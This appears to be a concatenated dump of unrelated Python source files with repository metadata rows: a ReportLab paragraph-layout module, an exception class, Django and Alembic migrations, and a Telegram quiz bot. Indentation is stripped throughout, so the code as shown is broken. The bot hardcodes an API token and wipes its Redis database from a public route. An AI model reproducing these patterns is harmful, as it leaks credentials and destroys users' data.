spaceWidth = stringWidth(' ', fontName, fontSize)
if not words:
currentWidth = -spaceWidth # hack to get around extra space for word 1
maxSize = fontSize
maxAscent, minDescent = getAscentDescent(fontName, fontSize)
wordWidth = w[0]
f = w[1][0]
if wordWidth > 0:
newWidth = currentWidth + spaceWidth + wordWidth
else:
newWidth = currentWidth
#test to see if this frag is a line break. If it is we will only act on it
#if the current width is non-negative or the previous thing was a deliberate lineBreak
lineBreak = hasattr(f, 'lineBreak')
endLine = (newWidth > maxWidth and n > 0) or lineBreak
if not endLine:
if lineBreak: continue #throw it away
nText = w[1][1]
if nText: n += 1
fontSize = f.fontSize
if calcBounds:
cbDefn = getattr(f, 'cbDefn', None)
if getattr(cbDefn, 'width', 0):
descent, ascent = imgVRange(cbDefn.height, cbDefn.valign, fontSize)
else:
ascent, descent = getAscentDescent(f.fontName, fontSize)
else:
ascent, descent = getAscentDescent(f.fontName, fontSize)
maxSize = max(maxSize, fontSize)
maxAscent = max(maxAscent, ascent)
minDescent = min(minDescent, descent)
if not words:
g = f.clone()
words = [g]
g.text = nText
elif not _sameFrag(g, f):
if currentWidth > 0 and ((nText != '' and nText[0] != ' ') or hasattr(f, 'cbDefn')):
if hasattr(g, 'cbDefn'):
i = len(words) - 1
while i >= 0:
wi = words[i]
cbDefn = getattr(wi, 'cbDefn', None)
if cbDefn:
if not getattr(cbDefn, 'width', 0):
i -= 1
continue
if not wi.text.endswith(' '):
wi.text += ' '
break
else:
if not g.text.endswith(' '):
g.text += ' '
g = f.clone()
words.append(g)
g.text = nText
else:
if nText != '' and nText[0] != ' ':
g.text += ' ' + nText
for i in w[2:]:
g = i[0].clone()
g.text = i[1]
words.append(g)
fontSize = g.fontSize
if calcBounds:
cbDefn = getattr(g, 'cbDefn', None)
if getattr(cbDefn, 'width', 0):
descent, ascent = imgVRange(cbDefn.height, cbDefn.valign, fontSize)
else:
ascent, descent = getAscentDescent(g.fontName, fontSize)
else:
ascent, descent = getAscentDescent(g.fontName, fontSize)
maxSize = max(maxSize, fontSize)
maxAscent = max(maxAscent, ascent)
minDescent = min(minDescent, descent)
currentWidth = newWidth
else: # either it won't fit, or it's a lineBreak tag
if lineBreak:
g = f.clone()
words.append(g)
if currentWidth > self.width: self.width = currentWidth
#end of line
lines.append(FragLine(extraSpace=maxWidth - currentWidth, wordCount=n,
lineBreak=lineBreak, words=words, fontSize=maxSize, ascent=maxAscent,
descent=minDescent))
#start new line
lineno += 1
try:
maxWidth = maxWidths[lineno]
except IndexError:
maxWidth = maxWidths[-1] # use the last one
if lineBreak:
n = 0
words = []
continue
currentWidth = wordWidth
n = 1
g = f.clone()
maxSize = g.fontSize
if calcBounds:
cbDefn = getattr(g, 'cbDefn', None)
if getattr(cbDefn, 'width', 0):
minDescent, maxAscent = imgVRange(cbDefn.height, cbDefn.valign, maxSize)
else:
maxAscent, minDescent = getAscentDescent(g.fontName, maxSize)
else:
maxAscent, minDescent = getAscentDescent(g.fontName, maxSize)
words = [g]
g.text = w[1][1]
for i in w[2:]:
g = i[0].clone()
g.text = i[1]
words.append(g)
fontSize = g.fontSize
if calcBounds:
cbDefn = getattr(g, 'cbDefn', None)
if getattr(cbDefn, 'width', 0):
descent, ascent = imgVRange(cbDefn.height, cbDefn.valign, fontSize)
else:
ascent, descent = getAscentDescent(g.fontName, fontSize)
else:
ascent, descent = getAscentDescent(g.fontName, fontSize)
maxSize = max(maxSize, fontSize)
maxAscent = max(maxAscent, ascent)
minDescent = min(minDescent, descent)
#deal with any leftovers on the final line
if words != []:
if currentWidth > self.width: self.width = currentWidth
lines.append(ParaLines(extraSpace=(maxWidth - currentWidth), wordCount=n,
words=words, fontSize=maxSize, ascent=maxAscent, descent=minDescent))
return ParaLines(kind=1, lines=lines)
return lines
def breakLinesCJK(self, width):
"""Initially, the dumbest possible wrapping algorithm.
Cannot handle font variations."""
if self.debug:
print id(self), "breakLinesCJK"
if not isinstance(width, (list, tuple)):
maxWidths = [width]
else:
maxWidths = width
style = self.style
#for bullets, work out width and ensure we wrap the right amount onto line one
_handleBulletWidth(self.bulletText, style, maxWidths)
if len(self.frags) > 1:
autoLeading = getattr(self, 'autoLeading', getattr(style, 'autoLeading', ''))
calcBounds = autoLeading not in ('', 'off')
return cjkFragSplit(self.frags, maxWidths, calcBounds, self.encoding)
elif not len(self.frags):
return ParaLines(kind=0, fontSize=style.fontSize, fontName=style.fontName,
textColor=style.textColor, lines=[], ascent=style.fontSize, descent=-0.2 * style.fontSize)
f = self.frags[0]
if 1 and hasattr(self, 'blPara') and getattr(self, '_splitpara', 0):
#NB this is an utter hack that awaits the proper information
#preserving splitting algorithm
return f.clone(kind=0, lines=self.blPara.lines)
lines = []
lineno = 0
self.height = 0
f = self.frags[0]
if hasattr(f, 'text'):
text = f.text
else:
text = ''.join(getattr(f, 'words', []))
from reportlab.lib.textsplit import wordSplit
lines = wordSplit(text, maxWidths[0], f.fontName, f.fontSize)
#the paragraph drawing routine assumes multiple frags per line, so we need an
#extra list like this
# [space, [text]]
#
wrappedLines = [(sp, [line]) for (sp, line) in lines]
return f.clone(kind=0, lines=wrappedLines, ascent=f.fontSize, descent=-0.2 * f.fontSize)
def beginText(self, x, y):
return self.canv.beginText(x, y)
def drawPara(self, debug=0):
"""Draws a paragraph according to the given style.
Returns the final y position at the bottom. Not safe for
paragraphs without spaces e.g. Japanese; wrapping
algorithm will go infinite."""
if self.debug:
print id(self), "drawPara", self.blPara.kind
#stash the key facts locally for speed
canvas = self.canv
style = self.style
blPara = self.blPara
lines = blPara.lines
leading = style.leading
autoLeading = getattr(self, 'autoLeading', getattr(style, 'autoLeading', ''))
#work out the origin for line 1
leftIndent = style.leftIndent
cur_x = leftIndent
if debug:
bw = 0.5
bc = Color(1, 1, 0)
bg = Color(0.9, 0.9, 0.9)
else:
bw = getattr(style, 'borderWidth', None)
bc = getattr(style, 'borderColor', None)
bg = style.backColor
#if has a background or border, draw it
if bg or (bc and bw):
canvas.saveState()
op = canvas.rect
kwds = dict(fill=0, stroke=0)
if bc and bw:
canvas.setStrokeColor(bc)
canvas.setLineWidth(bw)
kwds['stroke'] = 1
br = getattr(style, 'borderRadius', 0)
if br and not debug:
op = canvas.roundRect
kwds['radius'] = br
if bg:
canvas.setFillColor(bg)
kwds['fill'] = 1
bp = getattr(style, 'borderPadding', 0)
op(leftIndent - bp,
-bp,
self.width - (leftIndent + style.rightIndent) + 2 * bp,
self.height + 2 * bp,
**kwds)
canvas.restoreState()
nLines = len(lines)
bulletText = self.bulletText
if nLines > 0:
_offsets = getattr(self, '_offsets', [0])
_offsets += (nLines - len(_offsets)) * [_offsets[-1]]
canvas.saveState()
alignment = style.alignment
offset = style.firstLineIndent + _offsets[0]
lim = nLines - 1
noJustifyLast = not (hasattr(self, '_JustifyLast') and self._JustifyLast)
if blPara.kind == 0:
if alignment == TA_LEFT:
dpl = _leftDrawParaLine
elif alignment == TA_CENTER:
dpl = _centerDrawParaLine
elif self.style.alignment == TA_RIGHT:
dpl = _rightDrawParaLine
elif self.style.alignment == TA_JUSTIFY:
dpl = _justifyDrawParaLine
f = blPara
cur_y = self.height - getattr(f, 'ascent', f.fontSize) # TODO fix XPreformatted to remove this hack
if bulletText:
offset = _drawBullet(canvas, offset, cur_y, bulletText, style)
#set up the font etc.
canvas.setFillColor(f.textColor)
tx = self.beginText(cur_x, cur_y)
if autoLeading == 'max':
leading = max(leading, LEADING_FACTOR * f.fontSize)
elif autoLeading == 'min':
leading = LEADING_FACTOR * f.fontSize
#now the font for the rest of the paragraph
tx.setFont(f.fontName, f.fontSize, leading)
ws = getattr(tx, '_wordSpace', 0)
t_off = dpl(tx, offset, ws, lines[0][1], noJustifyLast and nLines == 1)
if f.underline or f.link or f.strike:
xs = tx.XtraState = ABag()
xs.cur_y = cur_y
xs.f = f
xs.style = style
xs.lines = lines
xs.underlines = []
xs.underlineColor = None
# XXX Modified for XHTML2PDF
xs.backgrounds = []
xs.backgroundColor = None
xs.backgroundFontSize = None
xs.strikes = []
xs.strikeColor = None
# XXX Modified for XHTML2PDF
xs.strikeFontSize = None
xs.links = []
xs.link = f.link
canvas.setStrokeColor(f.textColor)
dx = t_off + leftIndent
if dpl != _justifyDrawParaLine: ws = 0
# XXX Never underline!
underline = f.underline
strike = f.strike
link = f.link
if underline:
_do_under_line(0, dx, ws, tx)
if strike:
_do_under_line(0, dx, ws, tx, lm=0.125)
if link: _do_link_line(0, dx, ws, tx)
#now the middle of the paragraph, aligned with the left margin which is our origin.
for i in xrange(1, nLines):
ws = lines[i][0]
t_off = dpl(tx, _offsets[i], ws, lines[i][1], noJustifyLast and i == lim)
if dpl != _justifyDrawParaLine: ws = 0
if underline: _do_under_line(i, t_off + leftIndent, ws, tx)
if strike: _do_under_line(i, t_off + leftIndent, ws, tx, lm=0.125)
if link: _do_link_line(i, t_off + leftIndent, ws, tx)
else:
for i in xrange(1, nLines):
dpl(tx, _offsets[i], lines[i][0], lines[i][1], noJustifyLast and i == lim)
else:
f = lines[0]
cur_y = self.height - getattr(f, 'ascent', f.fontSize) # TODO fix XPreformatted to remove this hack
# default?
dpl = _leftDrawParaLineX
if bulletText:
oo = offset
offset = _drawBullet(canvas, offset, cur_y, bulletText, style)
if alignment == TA_LEFT:
dpl = _leftDrawParaLineX
elif alignment == TA_CENTER:
dpl = _centerDrawParaLineX
elif self.style.alignment == TA_RIGHT:
dpl = _rightDrawParaLineX
elif self.style.alignment == TA_JUSTIFY:
dpl = _justifyDrawParaLineX
else:
raise ValueError("bad align %s" % repr(alignment))
#set up the font etc.
tx = self.beginText(cur_x, cur_y)
xs = tx.XtraState = ABag()
xs.textColor = None
# XXX Modified for XHTML2PDF
xs.backColor = None
xs.rise = 0
xs.underline = 0
xs.underlines = []
xs.underlineColor = None
# XXX Modified for XHTML2PDF
xs.background = 0
xs.backgrounds = []
xs.backgroundColor = None
xs.backgroundFontSize = None
xs.strike = 0
xs.strikes = []
xs.strikeColor = None
# XXX Modified for XHTML2PDF
xs.strikeFontSize = None
xs.links = []
xs.link = None
xs.leading = style.leading
xs.leftIndent = leftIndent
tx._leading = None
tx._olb = None
xs.cur_y = cur_y
xs.f = f
xs.style = style
xs.autoLeading = autoLeading
tx._fontname, tx._fontsize = None, None
dpl(tx, offset, lines[0], noJustifyLast and nLines == 1)
_do_post_text(tx)
#now the middle of the paragraph, aligned with the left margin which is our origin.
for i in xrange(1, nLines):
f = lines[i]
dpl(tx, _offsets[i], f, noJustifyLast and i == lim)
_do_post_text(tx)
canvas.drawText(tx)
canvas.restoreState()
def getPlainText(self, identify=None):
"""
Convenience function for templates which want access
to the raw text, without XML tags.
"""
frags = getattr(self, 'frags', None)
if frags:
plains = []
for frag in frags:
if hasattr(frag, 'text'):
plains.append(frag.text)
return join(plains, '')
elif identify:
text = getattr(self, 'text', None)
if text is None: text = repr(self)
return text
else:
return ''
def getActualLineWidths0(self):
"""
Convenience function; tells you how wide each line
actually is. For justified styles, this will be
the same as the wrap width; for others it might be
useful for seeing if paragraphs will fit in spaces.
"""
assert hasattr(self, 'width'), "Cannot call this method before wrap()"
if self.blPara.kind:
func = lambda frag, w=self.width: w - frag.extraSpace
else:
func = lambda frag, w=self.width: w - frag[0]
return map(func, self.blPara.lines)
if __name__ == '__main__': # NORUNTESTS
def dumpParagraphLines(P):
print 'dumpParagraphLines(<Paragraph @ %d>)' % id(P)
lines = P.blPara.lines
for l, line in enumerate(lines):
line = lines[l]
if hasattr(line, 'words'):
words = line.words
else:
words = line[1]
nwords = len(words)
print 'line%d: %d(%s)\n ' % (l, nwords, str(getattr(line, 'wordCount', 'Unknown'))),
for w in xrange(nwords):
print "%d:'%s'" % (w, getattr(words[w], 'text', words[w])),
print
def fragDump(w):
R = ["'%s'" % w[1]]
for a in ('fontName', 'fontSize', 'textColor', 'rise', 'underline', 'strike', 'link', 'cbDefn', 'lineBreak'):
if hasattr(w[0], a):
R.append('%s=%r' % (a, getattr(w[0], a)))
return ', '.join(R)
def dumpParagraphFrags(P):
print 'dumpParagraphFrags(<Paragraph @ %d>) minWidth() = %.2f' % (id(P), P.minWidth())
frags = P.frags
n = len(frags)
for l in xrange(n):
print "frag%d: '%s' %s" % (
                l, frags[l].text, ' '.join(['%s=%s' % (k, getattr(frags[l], k)) for k in frags[l].__dict__ if k != 'text']))  # 'text' quoted: compare against the attribute name
l = 0
cum = 0
for W in _getFragWords(frags):
cum += W[0]
print "fragword%d: cum=%3d size=%d" % (l, cum, W[0]),
for w in W[1:]:
print '(%s)' % fragDump(w),
print
l += 1
from reportlab.lib.styles import getSampleStyleSheet, ParagraphStyle
from reportlab.lib.units import cm
import sys
TESTS = sys.argv[1:]
if TESTS == []:
TESTS = ['4']
def flagged(i, TESTS=TESTS):
return 'all' in TESTS or '*' in TESTS or str(i) in TESTS
styleSheet = getSampleStyleSheet()
B = styleSheet['BodyText']
style = ParagraphStyle("discussiontext", parent=B)
style.fontName = 'Helvetica'
if flagged(1):
text = '''The <font name=courier color=green>CMYK</font> or subtractive method follows the way a printer
mixes three pigments (cyan, magenta, and yellow) to form colors.
Because mixing chemicals is more difficult than combining light there
is a fourth parameter for darkness. For example a chemical
combination of the <font name=courier color=green>CMY</font> pigments generally never makes a perfect
black -- instead producing a muddy color -- so, to get black printers
don't use the <font name=courier color=green>CMY</font> pigments but use a direct black ink. Because
<font name=courier color=green>CMYK</font> maps more directly to the way printer hardware works it may
be the case that &| & | colors specified in <font name=courier color=green>CMYK</font> will provide better fidelity
and better control when printed.
'''
P = Paragraph(text, style)
dumpParagraphFrags(P)
aW, aH = 456.0, 42.8
w, h = P.wrap(aW, aH)
dumpParagraphLines(P)
S = P.split(aW, aH)
for s in S:
s.wrap(aW, aH)
dumpParagraphLines(s)
aH = 500
if flagged(2):
P = Paragraph("""Price<super><font color="red">*</font></super>""", styleSheet['Normal'])
dumpParagraphFrags(P)
w, h = P.wrap(24, 200)
dumpParagraphLines(P)
if flagged(3):
text = """Dieses Kapitel bietet eine schnelle <b><font color=red>Programme :: starten</font></b>
<onDraw name=myIndex label="Programme :: starten">
<b><font color=red>Eingabeaufforderung :: (>>>)</font></b>
<onDraw name=myIndex label="Eingabeaufforderung :: (>>>)">
<b><font color=red>>>> (Eingabeaufforderung)</font></b>
<onDraw name=myIndex label=">>> (Eingabeaufforderung)">
Einführung in Python <b><font color=red>Python :: Einführung</font></b>
<onDraw name=myIndex label="Python :: Einführung">.
Das Ziel ist, die grundlegenden Eigenschaften von Python darzustellen, ohne
sich zu sehr in speziellen Regeln oder Details zu verstricken. Dazu behandelt
dieses Kapitel kurz die wesentlichen Konzepte wie Variablen, Ausdrücke,
Kontrollfluss, Funktionen sowie Ein- und Ausgabe. Es erhebt nicht den Anspruch,
umfassend zu sein."""
P = Paragraph(text, styleSheet['Code'])
dumpParagraphFrags(P)
w, h = P.wrap(6 * 72, 9.7 * 72)
dumpParagraphLines(P)
if flagged(4):
text = '''Die eingebaute Funktion <font name=Courier>range(i, j [, stride])</font><onDraw name=myIndex label="eingebaute Funktionen::range()"><onDraw name=myIndex label="range() (Funktion)"><onDraw name=myIndex label="Funktionen::range()"> erzeugt eine Liste von Ganzzahlen und füllt sie mit Werten <font name=Courier>k</font>, für die gilt: <font name=Courier>i <= k < j</font>. Man kann auch eine optionale Schrittweite angeben. Die eingebaute Funktion <font name=Courier>xrange()</font><onDraw name=myIndex label="eingebaute Funktionen::xrange()"><onDraw name=myIndex label="xrange() (Funktion)"><onDraw name=myIndex label="Funktionen::xrange()"> erfüllt einen ähnlichen Zweck, gibt aber eine unveränderliche Sequenz vom Typ <font name=Courier>XRangeType</font><onDraw name=myIndex label="XRangeType"> zurück. Anstatt alle Werte in der Liste abzuspeichern, berechnet diese Liste ihre Werte, wann immer sie angefordert werden. Das ist sehr viel speicherschonender, wenn mit sehr langen Listen von Ganzzahlen gearbeitet wird. <font name=Courier>XRangeType</font> kennt eine einzige Methode, <font name=Courier>s.tolist()</font><onDraw name=myIndex label="XRangeType::tolist() (Methode)"><onDraw name=myIndex label="s.tolist() (Methode)"><onDraw name=myIndex label="Methoden::s.tolist()">, die seine Werte in eine Liste umwandelt.'''
aW = 420
aH = 64.4
P = Paragraph(text, B)
dumpParagraphFrags(P)
w, h = P.wrap(aW, aH)
print 'After initial wrap', w, h
dumpParagraphLines(P)
S = P.split(aW, aH)
dumpParagraphFrags(S[0])
w0, h0 = S[0].wrap(aW, aH)
print 'After split wrap', w0, h0
dumpParagraphLines(S[0])
if flagged(5):
text = '<para> %s <![CDATA[</font></b>& %s < >]]></para>' % (chr(163), chr(163))
P = Paragraph(text, styleSheet['Code'])
dumpParagraphFrags(P)
w, h = P.wrap(6 * 72, 9.7 * 72)
dumpParagraphLines(P)
if flagged(6):
for text in [
'''Here comes <FONT FACE="Helvetica" SIZE="14pt">Helvetica 14</FONT> with <STRONG>strong</STRONG> <EM>emphasis</EM>.''',
'''Here comes <font face="Helvetica" size="14pt">Helvetica 14</font> with <Strong>strong</Strong> <em>emphasis</em>.''',
'''Here comes <font face="Courier" size="3cm">Courier 3cm</font> and normal again.''',
]:
P = Paragraph(text, styleSheet['Normal'], caseSensitive=0)
dumpParagraphFrags(P)
w, h = P.wrap(6 * 72, 9.7 * 72)
dumpParagraphLines(P)
if flagged(7):
text = """<para align="CENTER" fontSize="24" leading="30"><b>Generated by:</b>Dilbert</para>"""
P = Paragraph(text, styleSheet['Code'])
dumpParagraphFrags(P)
w, h = P.wrap(6 * 72, 9.7 * 72)
dumpParagraphLines(P)
if flagged(8):
text = """- bullet 0<br/>- bullet 1<br/>- bullet 2<br/>- bullet 3<br/>- bullet 4<br/>- bullet 5"""
P = Paragraph(text, styleSheet['Normal'])
dumpParagraphFrags(P)
w, h = P.wrap(6 * 72, 9.7 * 72)
dumpParagraphLines(P)
S = P.split(6 * 72, h / 2.0)
print len(S)
dumpParagraphLines(S[0])
dumpParagraphLines(S[1])
if flagged(9):
text = """Furthermore, the fundamental error of
regarding <img src="../docs/images/testimg.gif" width="3" height="7"/> functional notions as
categorial delimits a general
convention regarding the forms of the<br/>
grammar. I suggested that these results
would follow from the assumption that"""
P = Paragraph(text, ParagraphStyle('aaa', parent=styleSheet['Normal'], align=TA_JUSTIFY))
dumpParagraphFrags(P)
w, h = P.wrap(6 * cm - 12, 9.7 * 72)
dumpParagraphLines(P)
if flagged(10):
text = """a b c\xc2\xa0d e f"""
P = Paragraph(text, ParagraphStyle('aaa', parent=styleSheet['Normal'], align=TA_JUSTIFY))
dumpParagraphFrags(P)
w, h = P.wrap(6 * cm - 12, 9.7 * 72)
dumpParagraphLines(P)
| [
"[email protected]"
] | |
c35827798e41b221d01c7605547d9563c1b93e01 | c040de12811afa588a23ad6c0cd4fdc849ab469f | /saklient/cloud/errors/usernotspecifiedexception.py | 4bd94f412d92c987223a12491a2dad83d3c4cda1 | [
"MIT"
] | permissive | toshitanian/saklient.python | 3707d1113744122c5ab1ae793f22c6c3a0f65bc4 | 287c56915dd825d676eddc538cbb33b483803dc2 | refs/heads/master | 2021-05-28T08:13:16.851101 | 2014-10-09T09:54:03 | 2014-10-09T09:54:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 790 | py | # -*- coding:utf-8 -*-
from ...errors.httpforbiddenexception import HttpForbiddenException
# module saklient.cloud.errors.usernotspecifiedexception
class UserNotSpecifiedException(HttpForbiddenException):
    ## The requested operation is not permitted. This API must be accessed with an authentication method that can identify the user.
## @param {int} status
# @param {str} code=None
# @param {str} message=""
def __init__(self, status, code=None, message=""):
super(UserNotSpecifiedException, self).__init__(status, code, "要求された操作は許可されていません。このAPIはユーザを特定できる認証方法でアクセスする必要があります。" if message is None or message == "" else message)
| [
"[email protected]"
] | |
cb17300b448fc5e8bf2a11a3c0e264dee6949afd | 20250e3dee97220e908d48e4a0d09fe1cbbf0ec0 | /app/migrations/0014_grupos.py | b7fd3449055bee2774d218416474b149b04ea48f | [] | no_license | sergio200086/Sistema-academico | 3e7af83301ddc7f380d03bad74485712b39b9aa6 | 70d03a67de6b72dff738560118f620c2fe7b016f | refs/heads/master | 2023-07-25T19:59:05.610314 | 2021-09-03T17:04:29 | 2021-09-03T17:04:29 | 402,836,941 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 831 | py | # Generated by Django 3.2 on 2021-05-18 19:57
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('app', '0013_profesores'),
]
operations = [
migrations.CreateModel(
name='Grupos',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('codigogrupo', models.CharField(max_length=50)),
('asignatura', models.CharField(max_length=50)),
('semestre', models.CharField(max_length=50)),
('profesorgrupo', models.ForeignKey(null=True, on_delete=django.db.models.deletion.PROTECT, related_name='profesorgrupo', to='app.profesores')),
],
),
]
| [
"[email protected]"
] | |
d15e9de176089c15a1ec2cf8cb55e7e06d17da4a | 06b6b2e090724557683e582641acecd3a0eecb59 | /src/calcularfactura.py | 2ee919ca1e1efe9919f7d9d11d9b18a4b891145b | [] | no_license | mmorac/factura | d0f6f8b0c50f74a9c695088d3366ed588c53f2e1 | 9c405575d072d262bdf4db01881701591cbd67d6 | refs/heads/master | 2022-04-25T18:34:49.474668 | 2020-04-24T08:23:43 | 2020-04-24T08:23:43 | 258,345,468 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,533 | py | import pandas as pd
import obtenerhoras
from datetime import datetime
def calcularfactura(fecha_inicio, fecha_fin):
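    # Sums the hour columns of factura.xlsx over the inclusive date range
    # [fecha_inicio, fecha_fin]. Dates arrive as "dd-mm" (year inferred around
    # the current month) or "dd/mm" (current year assumed); the spreadsheet
    # columns are expected to be named "YYYY-MM-DD".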
tabla = obtenerhoras.obtenerhoras("../archivos/factura.xlsx")
if("-" in fecha_inicio):
now = datetime.now()
fecha_inicio = fecha_inicio.split("-")
fecha_fin = fecha_fin.split("-")
if(int(fecha_inicio[1]) > now.month + 1):
f_inicio = str(now.year - 1) + "-" + fecha_inicio[1] + "-" + fecha_inicio[0]
else:
f_inicio = str(now.year) + "-" + fecha_inicio[1] + "-" + fecha_inicio[0]
f_fin = str(now.year) + "-" + fecha_fin[1] + "-" + fecha_fin[0]
elif("/" in fecha_inicio):
now = datetime.now()
fecha_inicio = fecha_inicio.split("/")
fecha_fin = fecha_fin.split("/")
f_inicio = str(now.year) + "-" + fecha_inicio[1] + "-" + fecha_inicio[0]
f_fin = str(now.year) + "-" + fecha_fin[1] + "-" + fecha_fin[0]
agregar = False
sumar = []
for i in range(len(tabla.columns)):
if(tabla.columns[i] == f_inicio):
agregar = True
elif(tabla.columns[i-1] == f_fin):
agregar = False
if(agregar):
sumar.append(tabla.columns[i])
tabla["Total Hours"] = tabla[sumar].sum(axis=1)
tabla["Total"] = tabla["Total Hours"] * tabla["Rate"]
sumar.insert(0, "Rate")
sumar.insert(0, "Resource Name")
sumar.insert(len(sumar), "Total Hours")
sumar.insert(len(sumar), "Total")
resultado = tabla[sumar]
return resultado
| [
"[email protected]"
] | |
9c5ad899ca1d6c2c86cb40d5304177a1ce2f9f26 | d4945242794561f7e8621b7cace4c7c9d5c9e7ab | /testbucket.py | 4ab9dfdb4c82d77b57b85ee3b0501cd64b75b242 | [] | no_license | synthicap/TestStackBot | b275a9438b786a9201da4f81f57971c732b4272c | 7fbbebdfc953eb05385e028e7569007869e52acc | refs/heads/master | 2021-06-16T08:09:23.898823 | 2017-05-04T21:55:59 | 2017-05-04T21:55:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,865 | py | import os
import pickle
from secrets import token_urlsafe
import telebot
from flask import Flask, request
from redis import from_url
from telebot.types import Update, ReplyKeyboardMarkup, KeyboardButton
class Task:
is_text = None
text = None
correct = None
class Test:
    def __init__(self):
        # instance attributes: class-level mutables would be shared by every
        # Test instance, so all tests would accumulate the same task list
        self.tasks = []
        self.results = {}
bot = telebot.TeleBot('345467048:AAEFochiYcGcP7TD5JqYwco8E56cOYCydrk')
app = Flask(__name__)
redis = from_url(os.environ['REDIS_URL'])
tests = {}
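# NOTE: the test currently being created or passed is parked under the literal
# dict key 'key', so only one such session can be active at a time; finished
# tests are persisted in Redis under their real token key.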
@bot.message_handler(commands=['start', 'help'])
def start(message):
text = '/new - create new test\n' \
'/pass - pass the test\n' \
'/mres - my result of the test\n' \
'/res - all results of the test\n' \
'/del - delete the test\n'
bot.send_message(message.chat.id, text)
@bot.message_handler(commands=['new'])
def new_test(message):
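    # expects the task count as a command argument: "/new <number_of_tasks>"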
try:
test = Test()
test.key = token_urlsafe(8)
test.num = int(message.text.split()[-1])
tests['key'] = test
bot.send_message(message.chat.id, f'Key: {test.key}')
msg = bot.send_message(message.chat.id, 'Enter the task text')
bot.register_next_step_handler(msg, set_task_text)
except Exception as e:
bot.reply_to(message, str(e) + ' 0')
def set_task_text(message):
try:
task = Task()
task.is_text = message.content_type == 'text'
if task.is_text:
task.text = message.text
else:
            task.text = message.photo[-1].file_id  # largest size variant, not the thumbnail
tests['key'].tasks.append(task)
msg = bot.send_message(message.chat.id, 'Enter the task correct answer')
bot.register_next_step_handler(msg, set_task_correct)
'''markup = ReplyKeyboardMarkup(one_time_keyboard=True, row_width=4)
markup.row(KeyboardButton(a) for a in answer)'''
except Exception as e:
bot.reply_to(message, str(e) + ' 2')
def set_task_correct(message):
try:
test = tests['key']
answer = message.text
if answer[0] == ':':
answer = set(answer.split()[1:])
test.tasks[-1].correct = answer
if test.num > 1:
test.num -= 1
msg = bot.send_message(message.chat.id, 'Enter the task text')
bot.register_next_step_handler(msg, set_task_text)
else:
key = test.key
del test.key
del test.num
del tests['key']
redis[key] = pickle.dumps(test)
bot.send_message(message.chat.id, 'Test successfully created!')
bot.send_message(message.chat.id, str(len(test.tasks)))
except Exception as e:
bot.reply_to(message, str(e) + ' 3')
@bot.message_handler(commands=['pass'])
def get_test(message):
try:
key = message.text.split()[-1]
test = pickle.loads(redis[key])
test.key = key
test.num = len(test.tasks)
test.ctasks = test.tasks.copy()
tests['key'] = test
test.results[message.from_user.username] = 0
bot.send_message(message.chat.id, f'Let\'s start the test, number of tasks: {test.num}')
task = test.tasks[0]
if task.is_text:
msg = bot.send_message(message.chat.id, task.text)
else:
msg = bot.send_photo(message.chat.id, task.text)
bot.register_next_step_handler(msg, get_task)
except Exception as e:
bot.reply_to(message, str(e) + ' 1')
def get_task(message):
try:
test = tests['key']
tasks = test.ctasks
name = message.from_user.username
correct = tasks.pop(0).correct
        if isinstance(correct, set):  # multi-answer tasks store a set of tokens
answer = set(message.text.split())
else:
answer = message.text
test.results[name] += answer == correct
if tasks:
            task = tasks[0]  # next unanswered task from the working copy
if task.is_text:
msg = bot.send_message(message.chat.id, task.text)
else:
msg = bot.send_photo(message.chat.id, task.text)
bot.register_next_step_handler(msg, get_task)
else:
bot.send_message(message.chat.id, f'Your result is: {test.results[name]} / {test.num}')
key = test.key
del test.key
del test.num
del test.ctasks
del tests['key']
redis[key] = pickle.dumps(test)
except Exception as e:
bot.reply_to(message, str(e) + '3')
@bot.message_handler(commands=['mres'])
def get_result(message):
try:
test = pickle.loads(redis[message.text.split()[-1]])
result = test.results[message.from_user.username]
num = len(test.tasks)
bot.send_message(message.chat.id, f'Your result is: {result} / {num}')
except Exception as e:
bot.reply_to(message, str(e) + '1')
@bot.message_handler(commands=['res'])
def get_list_results(message):
try:
test = pickle.loads(redis[message.text.split()[-1]])
num = len(test.tasks)
items = test.results.items()
        if items:
bot.send_message(message.chat.id, 'Results:\n' + ''.join(f'{i[0]}: {i[1]} / {num}\n' for i in items))
else:
bot.send_message(message.chat.id, 'No results')
except Exception as e:
bot.reply_to(message, str(e) + '1')
@bot.message_handler(commands=['del'])
def delete_test(message):
    try:
        # actually remove the pickled test from redis before confirming
        redis.delete(message.text.split()[-1])
        bot.send_message(message.chat.id, 'Test successfully deleted!')
except Exception as e:
bot.reply_to(message, str(e) + '1')
@app.route('/update', methods=['POST'])
def update():
bot.process_new_updates([Update.de_json(request.stream.read().decode('utf-8'))])
return '', 200
@app.route('/')
def index():
redis.flushdb()
bot.remove_webhook()
bot.set_webhook(url='https://teststackbot.herokuapp.com/update')
return '', 200
if __name__ == '__main__':
app.run()
| [
"[email protected]"
] | |
9b0e3331a7b373bdb5062de6b475a67be0194b67 | aca7781f4341a2d9e2c4e9aa663efe1fbfc20b26 | /migration/versions/617d6d1ed309_first.py | b37fe959fe46a7aba66867c3cfa0854280477307 | [] | no_license | rhezaas/hcl-user-service | 23944798939f85b875b8c65fd9a2ce0d33436485 | 3a841e52d4a593a4d2873a19152935f0680cda79 | refs/heads/master | 2023-08-16T23:31:34.994984 | 2021-03-01T16:20:24 | 2021-03-01T16:20:24 | 330,072,443 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,538 | py | """first
Revision ID: 617d6d1ed309
Revises:
Create Date: 2021-01-09 19:36:33.085083
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '617d6d1ed309'
down_revision = None
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.execute('CREATE SCHEMA IF NOT EXISTS "user"')
op.create_table(
'user',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('created_at', sa.DateTime(), nullable=True),
sa.Column('updated_at', sa.DateTime(), nullable=True),
sa.Column('firstname', sa.String(length=100), nullable=False),
sa.Column('lastname', sa.String(length=100), nullable=False),
sa.Column('profile', sa.Text(), nullable=True),
sa.Column('phone', sa.String(length=50), nullable=False),
sa.Column('deleted_at', sa.DateTime(), nullable=True),
sa.PrimaryKeyConstraint('id'),
schema='user'
)
op.create_table(
'account',
